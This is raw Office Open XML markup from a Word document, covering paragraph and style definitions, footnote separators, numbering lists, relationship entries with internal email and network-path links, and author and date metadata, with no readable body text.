    <w:p w14:paraId="7E869334" w14:textId="77777777" w:rsidR="00A87F1A" w:rsidRPr="00A87F1A" w:rsidRDefault="00A87F1A" w:rsidP="00A87F1A"/>
    <w:p w14:paraId="075C20A1" w14:textId="77777777" w:rsidR="00336227" w:rsidRDefault="00336227" w:rsidP="00C656B1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="745C65BA" w14:textId="77777777" w:rsidR="00C656B1" w:rsidRPr="00C656B1" w:rsidRDefault="00336227" w:rsidP="00C656B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7B774FA" w14:textId="77777777" w:rsidR="00C656B1" w:rsidRDefault="00C656B1" w:rsidP="00C656B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00C656B1" w:rsidSect="0074358B">
      <w:headerReference w:type="default" r:id="rId6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F26B" w14:textId="77777777" w:rsidR="00E949D2" w:rsidRDefault="00E949D2" w:rsidP="00A93EAF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="51A9A6B0" w14:textId="77777777" w:rsidR="00E949D2" w:rsidRDefault="00E949D2" w:rsidP="00A9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1"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable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B99E8" w14:textId="77777777" w:rsidR="00E949D2" w:rsidRDefault="00E949D2" w:rsidP="00A93EAF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6459943B" w14:textId="77777777" w:rsidR="00E949D2" w:rsidRDefault="00E949D2" w:rsidP="00A9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78FF1" w14:textId="77777777" w:rsidR="00E408CB" w:rsidRDefault="00E40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0C9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F508FDF2"/>
    <w:lvl w:ilvl="0" w:tplc="E2F44D2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71717"/>
        <w:w w:val="100"/>
        <w:sz w:val="26"/>
        <w:szCs w:val="26"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="F6026558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4E30F0A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B20C2844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26BE90D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1E7CBD2A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D1C3E40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69E62E7A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7D48BDB4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7496D06"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="888C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8B"/>
    <w:rsid w:val="001708B7"/>
    <w:rsid w:val="001772E6"/>
    <w:rsid w:val="00282DB8"/>
    <w:rsid w:val="002B2926"/>
    <w:rsid w:val="00336227"/>
    <w:rsid w:val="004D15E8"/>
    <w:rsid w:val="005B1265"/>
    <w:rsid w:val="005F1403"/>
    <w:rsid w:val="00732918"/>
    <w:rsid w:val="0074358B"/>
    <w:rsid w:val="007C298E"/>
    <w:rsid w:val="00997304"/>
    <w:rsid w:val="00A20C3E"/>
    <w:rsid w:val="00A47787"/>
    <w:rsid w:val="00A63D33"/>
    <w:rsid w:val="00A75819"/>
    <w:rsid w:val="00A87F1A"/>
    <w:rsid w:val="00A93EAF"/>
    <w:rsid w:val="00B05055"/>
    <w:rsid w:val="00B11A55"/>
    <w:rsid w:val="00B16534"/>
    <w:rsid w:val="00BE0CB1"/>
    <w:rsid w:val="00BF0C8D"/>
    <w:rsid w:val="00C53AEC"/>
    <w:rsid w:val="00C61D2D"/>
    <w:rsid w:val="00C656B1"/>
    <w:rsid w:val="00E3307C"/>
    <w:rsid w:val="00E408CB"/>
    <w:rsid w:val="00E40A94"/>
    <w:rsid w:val="00E949D2"/>
    <w:rsid w:val="00F23C10"/>
    <w:rsid w:val="00F3777C"/>
    <w:rsid w:val="00F51A31"/>
    <w:rsid w:val="00F57D78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94CB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{92BC5A54-3851-4480-B5B2-F0AFD8BC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6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3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43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3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3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6B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A47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7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3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AF"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A93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AF"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00BF0C8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0C8D"/>
    <w:rPr>
      <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Robo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D3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63D3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51A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1A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A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1A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172.16.99.11\temp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0.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:databaseagent@tech.finance.corp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mailto:techservice@tech.finance.corp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hyperlink" Target="mailto:tech/administrator@172.16.4.1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3F87-8565-43DF-811F-777A54AA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747</Words>
  <Characters>10675</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>71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L HASSAN</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>DANIYAL HASSAN</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <cp:lastPrinted>2023-09-24T14:55:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-24T06:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09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911319-ca75-47d3-8f8e-ea0f8537665a</vt:lpwstr>
  </property>
</Properties>
</file>